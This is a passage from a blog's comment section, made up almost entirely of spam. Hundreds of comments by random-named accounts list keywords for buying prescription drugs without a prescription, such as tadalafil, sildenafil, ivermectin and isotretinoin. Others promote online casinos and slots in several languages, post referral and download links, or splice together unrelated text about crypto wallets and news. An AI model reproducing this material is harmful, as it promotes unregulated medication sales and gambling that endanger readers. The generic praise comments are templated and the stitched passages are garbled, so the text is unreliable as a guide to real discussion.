  A lot of thanks for all of the hard work on this web page. My mum loves managing research and it’s really obvious why. I notice all relating to the dynamic way you convey informative guidelines by means of your web blog and strongly encourage contribution from the others on that concept and my girl is actually being taught a great deal. Take advantage of the remaining portion of the new year. You are always conducting a terrific job.

 109. jordan shoes says:

  I wish to point out my affection for your kind-heartedness giving support to those people who require help with that niche. Your special dedication to passing the message throughout had become extremely invaluable and have constantly empowered employees like me to arrive at their dreams. Your invaluable publication entails a lot to me and especially to my office workers. Warm regards; from each one of us.

 110. I and my friends were actually checking out the good tricks located on your web blog and so instantly I had a terrible suspicion I never expressed respect to the web site owner for those strategies. Most of the young men became excited to read all of them and have in effect surely been taking pleasure in those things. Thanks for really being well helpful and also for making a choice on some high-quality areas most people are really eager to be informed on. Our own sincere regret for not expressing gratitude to sooner.

 111. air jordan says:

  I and also my guys were found to be looking through the good secrets found on your web page then immediately got a horrible suspicion I had not expressed respect to you for those secrets. All the women had been for this reason very interested to learn all of them and already have in fact been loving those things. I appreciate you for getting indeed considerate and also for using this form of high-quality topics millions of individuals are really desirous to discover. Our sincere regret for not expressing appreciation to sooner.

 112. My wife and i got absolutely more than happy Emmanuel managed to finish up his researching through the precious recommendations he gained out of the site. It is now and again perplexing to just happen to be releasing facts which the rest may have been selling. We remember we’ve got the writer to give thanks to because of that. The main illustrations you made, the straightforward web site menu, the relationships your site help to create – it’s everything great, and it’s really helping our son in addition to our family do think this subject is cool, and that is highly fundamental. Thank you for everything!

 113. I wish to express appreciation to you for rescuing me from such a trouble. As a result of surfing around through the the web and obtaining basics which were not helpful, I figured my entire life was done. Existing minus the approaches to the issues you’ve sorted out by way of your main review is a critical case, as well as ones which may have in a negative way damaged my career if I hadn’t noticed the website. Your expertise and kindness in taking care of every part was priceless. I’m not sure what I would’ve done if I had not come upon such a subject like this. It’s possible to at this moment look forward to my future. Thanks a lot very much for your impressive and result oriented help. I won’t be reluctant to recommend the website to any person who requires support on this subject matter.

 114. I and my pals appeared to be looking at the best techniques located on your web site and so the sudden developed a terrible suspicion I never expressed respect to the site owner for them. The guys are already thrilled to read all of them and now have very much been having fun with these things. Thank you for being well considerate and also for making a decision on varieties of impressive tips most people are really needing to learn about. My very own sincere regret for not expressing appreciation to earlier.

 115. yeezy says:

  I and my guys have been following the great helpful hints found on your web page and so unexpectedly got an awful feeling I had not thanked the blog owner for them. Most of the ladies had been as a result joyful to read them and have in effect in reality been tapping into them. We appreciate you truly being indeed kind as well as for making a decision on this sort of important tips most people are really wanting to understand about. Our sincere regret for not saying thanks to you sooner.

 116. A lot of thanks for all of your labor on this website. My daughter takes pleasure in working on investigation and it’s simple to grasp why. Most people know all concerning the lively medium you offer sensible ideas by means of the web site and as well as improve contribution from visitors on this topic plus my princess has been starting to learn a lot of things. Have fun with the rest of the new year. You are always conducting a first class job.

 117. ShugScuts says:

  cialis order online tadalafil 5mg cost buy mobic 15mg for sale cost flomax 0

 118. Gihxzt says:

  anastrozole order order generic anastrozole 1 mg arimidex 1 mg without prescription

 119. Zqzjxo says:

  proventil 100 mcg pills buy pantoprazole sale cipro 1000mg pills

 120. Ahglsx says:

  order spiriva 9 mcg generic brand hytrin 1mg buy hytrin pills

 121. Ukukqx says:

  order generic montelukast 10mg order viagra without prescription buy sildenafil online

 122. Jqumkk says:

  actos medication sildenafil pill sildenafil 100mg pills

 123. Ughfdv says:

  buy generic cialis 20mg Cialis prescription order tadalafil 20mg without prescription

 124. Wrrawk says:

  oral tadalafil 5mg Cialis delivered overnight play money poker online

 125. Lhxgff says:

  ivermectin 6 avlosulfon 100 mg sale order dapsone online cheap

 126. Wdmidc says:

  real casino jackpot party casino jackpot party casino

 127. Qjrzqv says:

  slot casino online casino game real money casino online usa

 128. Cebhqx says:

  nifedipine 30mg canada buy allegra generic allegra 180mg oral

 129. Cdgpcz says:

  buy generic altace order amaryl 1mg without prescription arcoxia medication

 130. Jpcnwl says:

  best online casinos real money online casino roulette pay essay writing

 131. Jurorq says:

  doxycycline sale order cleocin 300mg generic buy cleocin 150mg pills

 132. Dcpjml says:

  help with assignments uk order azulfidine 500mg pills sulfasalazine online buy

 133. Ldkswa says:

  asacol 800mg ca purchase irbesartan pills irbesartan 150mg for sale

 134. Frqfwc says:

  olmesartan 20mg us order olmesartan 20mg generic buy divalproex 250mg

 135. Pvarkz says:

  order acetazolamide generic imdur 40mg over the counter buy azathioprine 50mg generic

 136. Zxgoiy says:

  buy temovate pill order cordarone 200mg online cordarone 100mg cost

 137. Eslzlv says:

  buy digoxin generic order molnunat pill molnunat online buy

 138. Hyhmpp says:

  amoxicillin cost purchase stromectol for sale stromectol tablets buy online

 139. Bsbfam says:

  coreg price coreg 6.25mg uk oral elavil

 140. Avslvd says:

  cheap priligy avanafil 100mg brand buy motilium 10mg sale

 141. Slvxae says:

  alendronate pill purchase motrin generic ibuprofen 600mg without prescription

 142. Pqjbad says:

  generic indocin tamsulosin 0.4mg without prescription buy cenforce 50mg generic

 143. Sfmojo says:

  buy nortriptyline 25 mg pill nortriptyline 25 mg oral order paroxetine 10mg generic

 144. Qnxgic says:

  doxycycline 100mg without prescription order generic chloroquine 250mg methylprednisolone 8 mg for sale

 145. Jpcwdp says:

  famotidine medication order remeron 15mg pills remeron 15mg us

 146. Zlopwb says:

  requip 1mg usa ropinirole 1mg over the counter labetalol medication

 147. Eveeay says:

  buy tadalafil 10mg without prescription order amoxicillin 500mg pill trimox buy online

 148. Ievypq says:

  fenofibrate 160mg oral cheapest viagra viagra 150 mg

 149. Rowoev says:

  nexium 40mg pill clarithromycin 500mg sale lasix medication

 150. Chiavf says:

  generic tadalafil 5mg Generic cialis cheap buy generic viagra 100mg

 151. Cyxjqw says:

  buy minocin sale hytrin 1mg uk buy terazosin sale

 152. Undjbg says:

  order generic tadalafil 5mg Buy cialis online cheap online ed meds

 153. Uyhyqx says:

  metformin 500mg canada calan generic tamoxifen 20mg pill

 154. Snfvxi says:

  order provigil online cheap stromectol order online buy promethazine 25mg pill

 155. Tppsfh says:

  clomid 100mg drug purchase atorvastatin without prescription prednisolone 10mg cost

 156. Dueyvh says:

  order deltasone 20mg online cheap buy isotretinoin 40mg generic cheap amoxil generic

 157. Rlrudu says:

  accutane 10mg pills isotretinoin 20mg canada buy ampicillin

 158. Czydpj says:

  fildena 50mg canada finasteride online buy proscar buy online

 159. Ppxoty says:

  ivermectin 3mg over the counter brand stromectol 6mg prednisone 40mg us

 160. Uvbtfc says:

  isotretinoin 40mg without prescription order amoxicillin without prescription buy zithromax pills

 161. Vtqlia says:

  buy ventolin 4mg for sale levothroid usa clavulanate tablet

 162. writing like yours nowadays.온라인카지노 I honestly appreciate people like
  you! Take care!!

 163. Zlatiu says:

  prednisolone 20mg uk oral prednisolone 20mg furosemide cheap

 164. Gqnhcl says:

  provigil pills lopressor for sale order lopressor 50mg

 165. Hdswtb says:

  order imuran 25mg pill buy micardis pill naprosyn 500mg price

 166. Sfmlcu says:

  order oxybutynin sale oxybutynin for sale online cheap trileptal

 167. Qxlkte says:

  omnicef sale omnicef 300 mg brand pantoprazole cheap

 168. Kqlqoi says:

  order generic simvastatin 10mg order simvastatin 10mg pill sildenafil 20mg

 169. Hkwasy says:

  dapsone us asacol oral cheap atenolol 100mg

 170. Zokzfn says:

  purchase uroxatral generic oral diltiazem diltiazem order online

 171. Yyompd says:

  cheap viagra 50mg overnight delivery cialis cialis prices

 172. Gtwzlb says:

  ezetimibe online purchase zetia pill methotrexate where to buy

 173. Xwwqnk says:

  promethazine 25mg cost real tadalafil for sale order tadalafil 10mg online

 174. Dapzgh says:

  order levofloxacin 500mg online ursodiol canada order bupropion 150mg pill

 175. Stradj says:

  coumadin online coumadin 5mg cheap buy allopurinol for sale

 176. Vkpmmd says:

  cetirizine pills order sertraline 100mg sale buy zoloft 50mg online

 177. Fzllgc says:

  cenforce 50mg cost buy chloroquine 250mg for sale buy generic glucophage 500mg

 178. Eowxjc says:

  lexapro 20mg drug purchase naltrexone for sale naltrexone 50 mg for sale

 179. Uelhts says:

  buy atorvastatin 10mg for sale order lipitor 80mg online order sildenafil pills

 180. Euwxko says:

  letrozole price buy viagra pill order sildenafil 100mg

 181. Knegli says:

  buy cialis for sale buy tadalafil online best pill for ed

 182. Zujwaw says:

  buy tadalafil 5mg online cheap ed solutions ed pills comparison

 183. Nbqmbx says:

  ivermectin lotion price prednisone 40mg generic order absorica for sale

 184. Jxnxiq says:

  buy provigil 100mg for sale prednisone 20mg ca oral deltasone 10mg

 185. Urndpx says:

  amoxicillin 500mg generic buy amoxicillin 500mg prednisolone 40mg pill

 186. Bhikyy says:

  accutane buy online brand amoxil 1000mg buy generic zithromax 500mg

 187. Ficpbl says:

  buy generic neurontin 600mg order generic lasix 40mg where to buy doxycycline without a prescription

 188. Hwzqom says:

  purchase prednisolone sale order furosemide 100mg pill lasix 100mg pill

 189. Pyoogr says:

  albuterol online buy augmentin order buy levothyroxine pill

 190. Qbiaeh says:

  order generic clomid order hydroxychloroquine 200mg online buy hydroxychloroquine 400mg online

 191. Sayceb says:

  doxycycline 100mg tablet buy ventolin pills for sale order augmentin 625mg

 192. Oiziyg says:

  tenormin without prescription medrol pills canada femara us

 193. Udhhte says:

  synthroid for sale clomiphene 100mg for sale levitra 10mg pill

 194. Tikfeu says:

  buy cheap generic albendazole albenza 400mg uk purchase medroxyprogesterone generic

 195. Quqvaz says:

  buy glycomet for sale buy glucophage cheap buy amlodipine 10mg pills

 196. Sybcoz says:

  order praziquantel generic periactin 4mg usa brand cyproheptadine 4 mg

 197. Anhrzw says:

  buy lisinopril generic order metoprolol 100mg order metoprolol 100mg for sale

 198. Lcbagr says:

  lyrica buy online buy loratadine 10mg pill buy priligy 30mg pill

 199. Jbsczq says:

  buy methotrexate without a prescription buy methotrexate 5mg without prescription metoclopramide 20mg drug

 200. Dfwifv says:

  buy orlistat without prescription order acyclovir generic generic zyloprim

 201. Ktkmmw says:

  losartan 50mg without prescription topamax 100mg for sale buy topiramate 200mg online cheap

 202. Ofzaye says:

  rosuvastatin 10mg cheap domperidone drug oral domperidone 10mg

 203. Nyyfun says:

  imitrex over the counter oral dutasteride avodart pills

 204. Mxngdb says:

  purchase tetracycline order baclofen 25mg pills order ozobax

 205. Lvkyit says:

  buy toradol online where to buy toradol without a prescription buy inderal 10mg generic

 206. Vwawog says:

  purchase zantac pills celebrex 100mg generic buy celebrex tablets

 207. Zwhpim says:

  buy clopidogrel 150mg sale order clopidogrel 75mg online cheap order nizoral without prescription

 208. Nurvix says:

  buy tamsulosin online cheap order spironolactone without prescription aldactone canada

 209. Pwactu says:

  cialis for sales buy tadalafil without prescription viagra drug

 210. Cfhviv says:

  order duricef 500mg generic cefadroxil pill propecia pill

 211. Wkjpcw says:

  buy diflucan without a prescription where to buy fluconazole without a prescription purchase ciprofloxacin online cheap

 212. Nawccb says:

  order estradiol without prescription lamotrigine 50mg pills prazosin ca

 213. Moayft says:

  order flagyl 200mg for sale brand flagyl 200mg order generic cephalexin 125mg

 214. Your article helped me a lot, is there any more related content? Thanks! https://www.binance.com/ro/register?ref=UM6SMJM3

 215. Shgcuc says:

  vermox 100mg canada buy vermox online tadalafil 10mg ca

 216. Pvbcoi says:

  buy generic cleocin online fildena 100mg price cost sildenafil 100mg

 217. Rltozg says:

  avana 100mg uk cost tadalafil 20mg oral diclofenac

 218. Xhinim says:

  nolvadex 20mg usa ceftin for sale online cost cefuroxime

 219. Vnclrd says:

  buy indocin generic cefixime price cefixime 200mg pills

 220. Pdwwhr says:

  buy careprost for sale desyrel order online order trazodone

 221. Fdomme says:

  trimox for sale online amoxicillin 250mg price buy biaxin pill

 222. Nlhhzh says:

  how to get suhagra without a prescription sildalis order sildenafil citrate 50mg

 223. Oamase says:

  order catapres 0.1 mg without prescription order clonidine 0.1mg pills spiriva drug

 224. Ftiyjp says:

  minocycline 100mg pills generic minocycline 100mg order pioglitazone sale

 225. Hcdyxf says:

  leflunomide order arava 20mg sale sulfasalazine 500 mg uk

 226. Dedqiu says:

  isotretinoin 10mg ca zithromax pills azithromycin oral

 227. Bwywsy says:

  tadalafil over counter tadalafil without prescription buy cialis 5mg generic

 228. Wczzpl says:

  azithromycin 250mg sale buy prednisolone 10mg online cheap buy gabapentin without prescription

 229. Wsoegp says:

  generic lasix 100mg buy furosemide 40mg sale buy albuterol generic

 230. Pgpnnl says:

  vardenafil generic vardenafil usa buy plaquenil paypal

 231. Hptjwi says:

  buy ramipril pills purchase amaryl generic arcoxia 60mg uk

 232. Ecacis says:

  levitra 10mg drug hydroxychloroquine 200mg uk hydroxychloroquine 400mg for sale

 233. Hbxeul says:

  asacol 800mg without prescription order astelin generic buy irbesartan

 234. Mdfymv says:

  order olmesartan 10mg order calan 120mg for sale buy depakote no prescription

 235. Yytpyz says:

  buy generic temovate buy generic amiodarone over the counter amiodarone 100mg over the counter

 236. Tgudzi says:

  acetazolamide 250 mg price acetazolamide 250 mg cost order azathioprine pill

 237. Qmrote says:

  lanoxin 250 mg cost buy generic molnunat molnupiravir 200mg canada

 238. Informative article, just what I was looking for.

  My site free mp3 download

 239. Haqvja says:

  buy generic naprosyn for sale naproxen 250mg us lansoprazole 15mg us

 240. Tvelns says:

  coreg 6.25mg ca aralen without prescription chloroquine price

 241. I pay a visit every day a few websites and blogs to\r\nread articles, except this website provides feature based content.\r\n\r\nAlso visit my site : youtube to mp3

 242. I pay a visit every day a few websites and blogs to\r\nread articles, except this website provides feature based content.\r\n\r\nAlso visit my site : youtube to mp3

 243. Acfdbt says:

  buy proventil pill protonix 40mg without prescription buy phenazopyridine 200mg pill

 244. Mzwfni says:

  buy generic montelukast online montelukast order online cheap avlosulfon 100mg

 245. Hvyzmq says:

  baricitinib usa purchase lipitor generic atorvastatin 20mg drug

 246. Phsztd says:

  order nifedipine 30mg sale purchase nifedipine without prescription cost allegra

 247. Lmfhzb says:

  buy amlodipine how to get lisinopril without a prescription buy generic prilosec 10mg

 248. Idnmjx says:

  buy dapoxetine 60mg online buy orlistat online cheap xenical usa

 249. Kuknht says:

  buy metoprolol 100mg online cheap lopressor 100mg brand methylprednisolone 4 mg otc

 250. Arutwz says:

  diltiazem over the counter zovirax 800mg drug buy allopurinol 100mg pill

 251. Sdetom says:

  buy crestor 20mg buy generic domperidone over the counter order domperidone pill

 252. Vfaoyl says:

  order aristocort 10mg generic order desloratadine 5mg for sale order claritin 10mg

 253. Bmcbip says:

  tetracycline 250mg cost order baclofen 25mg generic order baclofen 10mg pill

 254. Bohcro says:

  buy ampicillin cheap ampicillin 250mg drug flagyl ca

 255. Kmtbct says:

  how to get ketorolac without a prescription colchicine 0.5mg cheap inderal 10mg brand

 256. Pdafqb says:

  order septra without prescription buy generic clindamycin order generic cleocin 300mg

 257. Lgtnlh says:

  clopidogrel drug coumadin cost buy warfarin tablets

 258. Apflfd says:

  order erythromycin 500mg pills buy cheap nolvadex buy generic tamoxifen 20mg

 259. Larjos says:

  metoclopramide cost order metoclopramide 10mg sale nexium order online

 260. Qtorpj says:

  rhinocort over the counter oral cefuroxime buy careprost without prescription

 261. Bagecp says:

  cheap topiramate levaquin 250mg cost levaquin where to buy

 262. Llgpcl says:

  purchase methocarbamol generic brand robaxin buy sildenafil 100mg generic

 263. Zjowgs says:

  order dutasteride generic meloxicam us order meloxicam for sale

 264. Acwarc says:

  order generic celecoxib ondansetron over the counter order zofran generic

 265. Gkvixm says:

  buy sildenafil 100mg order sildenafil 100mg without prescription estradiol pills

 266. Wvhlbw says:

  buy aldactone pills for sale valtrex 1000mg over the counter order valtrex pill

 267. где купить справку

 268. Tccmqu says:

  buy lamictal 50mg without prescription buy cheap prazosin buy prazosin sale

 269. Thanks for ones marvelous posting! I definitely enjoyed reading it, you can be a great author. I will make sure to bookmark your blog and will come back in the foreseeable future. I want to encourage you to definitely continue your great posts, have a nice afternoon!

 270. Umdclo says:

  finasteride sale viagra tablet viagra 100mg tablet

 271. Qazfmy says:

  retin order purchase avana avana 200mg oral

 272. Opootw says:

  buy cialis 20mg viagra price viagra 100mg price

 273. Lfmmbh says:

  order tadalafil 10mg without prescription indocin 50mg cost cost indocin 75mg

 274. Wqusnd says:

  tadalafil 10mg brand order diflucan 200mg generic best ed medication

 275. Howdy I am so grateful I found your blog page, I really found you by mistake, while I was searching on Askjeeve for something else, Regardless I am here now and would just like to say thank you for a incredible post and a all round enjoyable blog (I also love the theme/design), I dont have time to browse it all at the minute but I have saved it and also included your RSS feeds, so when I have time I will be back to read a lot more, Please do keep up the superb b.

 276. Qqrnmy says:

  buy terbinafine 250mg generic lamisil 250mg sale order trimox

 277. Heya i’m for the first time here. I came across this board and I find It truly useful & it helped me out a lot. I hope to give something back and help others like you helped me.

 278. Ufepjj says:

  purchase sulfasalazine online verapamil over the counter calan cost

 279. Undeniably believe that which you stated. Your favorite justification appeared to be on the net the simplest thing to be aware of. I say to you, I definitely get irked while people consider worries that they plainly do not know about. You managed to hit the nail upon the top as well as defined out the whole thing without having side effect , people can take a signal. Will likely be back to get more. Thanks

 280. This is a good tip especially to those new to the blogosphere. Brief but very accurate information Thank you for sharing this one. A must read article!

 281. Jgwinb says:

  order divalproex without prescription order divalproex for sale order isosorbide 40mg online

 282. bluep says:

  Ümit Özdağ’dan Sessiz İstila ve sığınmacılar için yeni açıklama: Türkiye’yi ikiye bölecek hatta yerleştirildiler Es posible que los Sticky Wilds aparezcan en el juego base, pero no siempre es así. Hay video tragamonedas en las que los comodines pegajosos solo se ven en los giros gratis. En este caso, se quedan pegados en los rodillos sólo durante la ronda gratuita pero no en el juego base. Por las pruebas que hemos realizado hasta el momento, en nuestra opinión GAMEE Prizes es el mejor juego para ganar dinero del momento. Su facilidad de uso, con todo integrado, y lo rápido que hemos podido generar dinero y recibir el pago a través de PayPal, lo convierten en la mejor opción. Las tragaperras más populares Regulación La presión de perder dinero real desaparece si juegas a tragamonedas gratis. Si apuestas por diversión, hacerlo gratis es la mejor opción. Y al no necesitar registro ni descarga, puedes empezar a jugar de inmediato.
  https://paxtonxwsp397655.livebloggs.com/25590630/juegos-de-tragamonedas-reales
  Los juegos didácticos y educativos para niños son una herramienta esencial para el aprendizaje y el desarrollo infantil. Desde juegos en línea hasta simuladores y juegos educativos prácticos, existe una amplia variedad de opciones disponibles para ayudar a los niños a aprender de manera divertida y efectiva. Los juegos educativos también pueden ser una herramienta útil para fomentar la creatividad, la imaginación y el interés por el aprendizaje. Al elegir los juegos adecuados, los padres y educadores pueden ayudar a los niños a desarrollar habilidades cognitivas, sociales y motoras, y a prepararlos para el éxito académico y personal en el futuro. Este juego es muy sencillo y, como el cuatro en raya, requiere de cierta atención frente a tu oponente. Dibuja varios círculos en el folio. Cada jugador trazará una línea entre un punto y otro, pero solo se consiguen puntos cuando se consigue cerrar un cuadrado. ¡Sé astuto y ciérralos antes que tu rival para vencer!

 283. Bouuul says:

  cheap arimidex 1 mg order arimidex 1mg online cheap catapres 0.1mg cheap

 284. daachka.ru says:

  Normally I do not read article on blogs, however I wish to say that this write-up very forced me to try and do so! Your writing taste has been amazed me. Thank you, quite great article.

 285. daachka.ru says:

  I get pleasure from, lead to I found exactly what I used to be looking for. You have ended my 4 day long hunt! God Bless you man. Have a nice day. Bye

 286. Zybgdq says:

  generic azathioprine 50mg lanoxin ca micardis 80mg for sale

 287. Nyyuvg says:

  order meclizine 25 mg pills buy tiotropium bromide 9 mcg generic minocycline pill

 288. nadachee.ru says:

  Good info. Lucky me I found your website by accident (stumbleupon). I have saved it for later!

 289. Acwbpp says:

  molnupiravir 200 mg over the counter molnupiravir 200 mg pills purchase cefdinir pill

 290. Fcablc says:

  natural ed pills brand viagra pills viagra pills

 291. Uhahtw says:

  buy cheap generic prevacid order prevacid 15mg pills pantoprazole 20mg ca

 292. zen says:

  Wielu graczy już na starcie rezygnuje z rozgrywki w kasynie online. Barierą nie do przejścia okazuje się często kwota minimalnej wpłaty, jaką musi dokonać gracz, aby rozpocząć grę. Na szczęście coraz więcej operatorów decyduje się na znaczące obniżenie progu minimalnego depozytu, czym zachęcają do rejestracji i wpłat większą ilość graczy. Tak właśnie powstaje typ kasyna, który cieszy się ogromną popularnością wśród graczy – kasyno z minimalnym depozytem. Sloty – kategoria w której nasi klienci znajdą setki różnorodnych automatów hazardowych a także jednorękich bandytów w wersji online. Nasze kasyno korzysta z najbardziej popularnych propozycji pochodzących od wiodących marek na rynku. Posiadamy tak znane gry jak: Stunning Hot, Book Of Ming, Wild Jack, Stunning Hot 20 Deluxe, Royal Crown, Magic Stars 3, Great Book Of Magic, Magic Of The Ring, Magic Target Deluxe, Sizzling 777 Deluxe oraz wiele, wiele innych tytułów hazardowych.
  https://www.anhflow.com/bbs/board.php?bo_table=free&wr_id=8484
  Teraz już wszystko wiesz na temat tego, czym są darmowe bonusy, premie bez depozytu i tak dalej. Warto więc wykorzystać nabytą w ten sposób wiedzę w praktyce, nieprawdaż? Przejdź więc do kasyna internetowego, które oferuje taki bonus i zacznij grać za pomocą środków bonusowych. Nawet jeśli Ci nie wyjdzie z wymogiem obrotu, to nic nie stracisz, bo i tak dostałeś środki za darmo. Ale zawsze możesz przecież wygrać! A wiesz, gdzie szukać kasyna oferujące najlepsze bonusy bez depozytu 2023, prawda? Rozejrzyj się dookoła! Jeśli Ty też należysz do tego szerokiego grona graczy, którzy uwielbiają wszelkiego rodzaju bonus za rejestrację bez depozytu 2023 bez konieczności wpłacania pieniędzy na swoje konto w kasynie online, to mamy dla Ciebie dzisiaj wspaniałą wiadomość. Otóż opracowaliśmy rozbudowaną i niezwykle drobiazgową listę kasyn internetowych, które oferują nowym graczom darmowe spiny bez depozytu. Oraz oczywiście wiele innych promocji. Jednak my skupiamy się tutaj głównie na konkretnych promocjach – a sam przyznasz na pewno, że 50 darmowych spinów to jest coś, obok czego nie można przejść obojętnie!

 293. Very rapidly this site will be famous among all blogging and site-building users, due to it’s nice articles

 294. You can definitely see your enthusiasm in the article you write. The world hopes for more passionate writers like you who aren’t afraid to mention how they believe. All the time go after your heart.

 295. Vndfhd says:

  pyridium 200 mg pills montelukast 10mg cheap how to get symmetrel without a prescription

 296. Futlao says:

  causes of erectile dysfunction order cialis 20mg sale order tadalafil 20mg

 297. daachka.ru says:

  When someone writes an piece of writing he/she keeps the idea of a user in his/her mind that how a user can understand it. Thus that’s why this piece of writing is great. Thanks!

 298. yes-dacha.ru says:

  Awesome blog! Is your theme custom made or did you download it from somewhere? A design like yours with a few simple adjustements would really make my blog jump out. Please let me know where you got your design. Cheers

 299. Ocijno says:

  order avlosulfon 100 mg without prescription adalat 30mg price buy aceon paypal

 300. Jkcmjo says:

  top ed drugs tadalafil 40mg pill tadalafil pills

 301. What’s up, yes this article is actually pleasant and I have learned lot of things from it regarding blogging. thanks.

 302. Uogenk says:

  cheap fexofenadine ramipril 10mg us brand amaryl 4mg

 303. Hello there! This is my first visit to your blog! We are a collection of volunteers and starting a new initiative in a community in the same niche. Your blog provided us valuable information to work on. You have done a outstanding job!

 304. Gtxmcn says:

  cheap etoricoxib 120mg order astelin 10ml generic purchase azelastine sprayer

 305. Gunda says:

  Grier recommended only investing in projects in which the core team uses real-world names and credentials. In this assignment you will be writing a series of Bitcoin scripts to enact transfers. You will be using a Bitcoin test network to do so. While regular Bitcoin uses the abbreviation BTC, we will use the abbreviation ‘tBTC’ (for test-BTC) for the Bitcoin on our test network. An irrevocable trust, once established, cannot be modified by the grantor or trustee, differentiating it from alterable, revocable trusts. FUD is a crypto slang acronym that means “Fear, Uncertainty, and Doubt.” FUD is an emotional state that major swings in the cryptocurrency market can trigger. The slang “FUD” was common in 2018 when cryptocurrency prices were so volatile and changed dramatically by the minute, building and REKTing investors’ portfolios, which caused “Fear, Uncertainty and Doubt” (FUD) amongst cryptocurrency traders and investors. 
  https://findingthenewu.com/community/profile/7941dcliv551dcc/
  Trust Wallet. “Trust Wallet Launches Its Browser Extension!” Trust Wallet will now be showing you your seed phrase, along with instructions to write it down. In the next step, you will have to re-enter your seed phrase. This is the most crucial step of creating your wallet – backing up your seed phrase. Trust Wallet and many other wallet providers recommend writing down your seed phrase and storing it in a safe place, however this is not ideal. We have many guides on all the different ways to back up your seed phrase. The last stage is to pick which coin the deposit address will belong to. Since you can’t add one without knowing which address, otherwise it could go to any wrong blockchain and it will be lost. So pick the right ETH and network combination in order to make sure you receive your funds. Next up, go to Trust Wallet in order to get the deposit address.

 306. I blog quite often and I truly appreciate your content. This article has really peaked my interest. I am going to bookmark your website and keep checking for new information about once a week. I subscribed to your RSS feed as well.

 307. Znramx says:

  oral hytrin oral arava tadalafil 5mg us

 308. Hhnwdg says:

  oral avapro 150mg irbesartan 150mg usa buspar 10mg canada

 309. Someone necessarily help to make significantly articles I might state. This is the first time I frequented your web page and thus far? I amazed with the research you made to create this actual submit amazing. Fantastic process!

 310. Okdvnw says:

  order amiodarone sale generic dilantin 100mg purchase dilantin pill

 311. Ebahjj says:

  albenza buy online buy medroxyprogesterone cheap buy medroxyprogesterone tablets

 312. Hi there, all the time i used to check blog posts here early in the morning, since i like to learn more and more.

 313. I go to see day-to-day some web pages and blogs to read posts, but this blog provides quality based posts.

 314. Jurist says:

  If you are going for most excellent contents like me, only pay a visit this website everyday as it gives quality contents, thanks

 315. quade says:

  Slot Online Gampang Jackpot Paling Gacor Maxwin Setiap Hari Ada Bonus Minimal deposit 10rb dan tanpa potongan melalui aplikasibandar slot deposit pulsabisa jadi opsi bagus khususnya bagi anggota baru pertama kali bergabung, perilisan pembayaran dari pulsa untuk bermain judi slot karena ingin memberikan kemudahan bagi setiap member member yang tidak mau menunggu lama atau tidak dapat melakukan deposit melakukan transaksi. Dengan bonus deposit yang bakal membantu serta bisa memaksimalkan potensi permainan dengan beberapa bonus dibawah seperti berikut. Para member akan mendapatkan kemudahan dalam bertransaksi melalui sistem bank transfer (BCA, BNI, BRI, BSI, Danamon, Mandiri, Nobu, OCBC, Panin, Permata, dan Sumut). Selain itu, juga tersedia pembayaran e-wallet melalui Dana, Gopay, LinkAja, dan Ovo.
  https://telegra.ph/best-online-casino-canada-real-money-05-04
  After reading the above, you should better understand the abundant US online slots that deal with real money. You can win big by playing these casino slots online for real money. Whether Shark Spin from Wild Casino with an RTP of 97.03% or Jungle Stripes by BetOnline with an RTP of 97.05%, each will provide you a terrific chance at winning big. RTP can also be referred to as a payout ratio when playing online slots that pay real money. The best online slots refer to slots with the highest % of RTP. While free slots are loads of fun, the only way to have a genuine casino experience is to play real money slots. Online slots for real money allow you to play and win cash instantly, bringing the kind of excitement that was once only possible in traditional casinos.

 316. Its like you read my mind! You seem to know so much about this, like you wrote the book in it or something. I think that you could do with some pics to drive the message home a bit, but other than that, this is wonderful blog. A great read. I’ll definitely be back.

 317. Uwttka says:

  how to buy praziquantel buy generic hydrochlorothiazide cyproheptadine 4 mg tablet

 318. Gahvld says:

  oxybutynin 5mg for sale buy elavil 10mg sale cost alendronate 35mg

 319. Lzmqgw says:

  order fluvoxamine online ketoconazole 200 mg over the counter buy duloxetine online

 320. My partner and I absolutely love your blog and find many of your post’s to be exactly I’m looking for. Do you offer guest writers to write content to suit your needs? I wouldn’t mind publishing a post or elaborating on most of the subjects you write about here. Again, awesome web site!

 321. Xlojey says:

  nitrofurantoin 100 mg canada order nortriptyline 25mg sale buy nortriptyline 25mg without prescription

 322. Hello there, just became aware of your blog through Google, and found that it is really informative. I’m gonna watch out for brussels. I will appreciate if you continue this in future. A lot of people will be benefited from your writing. Cheers!

 323. cax says:

  Playing casino games for free on mobile is all the rage these days. Players like the convenience of playing on-the-go. As with any NetEnt game out there, Starburst slot is fully mobile-compatible, which means you can enjoy it on any operating system for free or for real money. Starburst slot changes its layout to optimize for the smaller screen on your hand-held device. Playing on mobile is as gloriously smooth as on your PC. Following that the game plays on Flash Player means you will not miss a moment of the action over clunky gameplay. Cashback up to 20% So what makes Starburst so special? We’ll discuss this in our honest review of Starburst slot, so keep reading to learn more about this amazing slot game and to find out where it’s best for Canadian players to try it for free or for real money!
  http://ynw.co.kr/bbs/board.php?bo_table=free&wr_id=219462
  The online casino uses the latest 128-bit Secure Socket Layer (SSL) encryption technology to protect player details when they are being transferred online to its firewall-protected servers. Moreover, the online casino has a sound privacy policy that prevents it from sharing, selling, or revealing player details to third party individuals or companies. Since the online casino has partnered with noted providers, the gaming environment can be expected to be 100% fair. TOGG’dan ‘teknoloji’sürprizi:2023’te yollara çıkması beklenen Türkiye’nin otomobili Togg’un CEO’su Gürcan Karakaş, lansmanı yapılacak ilk ürünün otomobil olmayacağını bildirdi. Karakaş, ‘Şu ana kadar… 70 Free Spins at Grand Eagle Casino 2023’te yollara çıkması beklenen Türkiye’nin otomobili Togg’un CEO’su Gürcan Karakaş, lansmanı yapılacak ilk ürünün otomobil olmayacağını bildirdi. Karakaş,…

 324. Yvfmni says:

  glucotrol drug buy betamethasone 20 gm online cheap betnovate without prescription

 325. We are a group of volunteers and starting a new scheme in our community. Your site provided us with helpful information to work on. You have performed an impressive process and our whole community will probably be grateful to you.

 326. bsffmlWs says:

  These include fried foods, processed foods with partially hydrogenated oils, and processed meats such as bacon how long does propecia take to work

 327. I love your blog.. very nice colors & theme. Did you design this website yourself or did you hire someone to do it for you? Plz reply as I’m looking to design my own blog and would like to know where u got this from. kudos

 328. Vgdgrd says:

  order acetaminophen pill paroxetine cost order famotidine 40mg sale

 329. I think this is one of the most significant information for me. And i’m glad reading your article. But want to remark on few general things, The website style is great, the articles is really nice : D. Good job, cheers

 330. Egfrds says:

  cost tinidazole tindamax 300mg without prescription where can i buy nebivolol

 331. Cogztb says:

  tacrolimus pills oral ropinirole 2mg ropinirole usa

 332. Rjdoma says:

  diovan 160mg drug buy diovan paypal cost ipratropium 100mcg

 333. Njasww says:

